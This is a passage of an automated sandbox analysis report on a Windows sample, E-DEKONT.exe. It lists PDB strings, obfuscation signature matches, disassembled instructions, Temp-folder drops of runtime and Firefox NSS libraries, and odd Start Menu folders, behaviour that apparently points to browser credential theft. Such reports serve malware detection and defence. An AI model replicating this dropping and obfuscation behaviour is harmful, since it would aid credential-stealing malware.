Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108884231351.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943979243.000000001E774000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908823587.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908941995.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944687963.000000001E79C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108892004613.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108891891978.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108909446480.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108887027855.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108886923210.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939672315.000000001E714000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944495518.000000001E78C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108913399205.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr

Data Obfuscation

barindex
Source: Yara match File source: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.108599370042.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6496D push ecx; ret 1_2_02B64ACF
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B640BB push ecx; ret 1_2_02B6409A
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B640BB push esi; retf 1_2_02B6410B
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B692E3 push FFFFFFB9h; retf 1_2_02B692EA
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B64A56 push ecx; ret 1_2_02B64ACF
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B64A4D push ecx; ret 1_2_02B64ACF
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B63FAF push ecx; ret 1_2_02B6409A
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6638C push ss; iretd 1_2_02B6638E
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B63FEC push ecx; ret 1_2_02B6409A
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B62321 push ds; ret 1_2_02B62323
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B61517 push esp; retf 1_2_02B61519
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B63D57 pushfd ; iretd 1_2_02B63D58
Source: msvcp140.dll.4.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_10001B18
Source: api-ms-win-core-console-l1-1-0.dll.4.dr Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Internalisere Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Internalisere\Brnesangen.End Jump to behavior
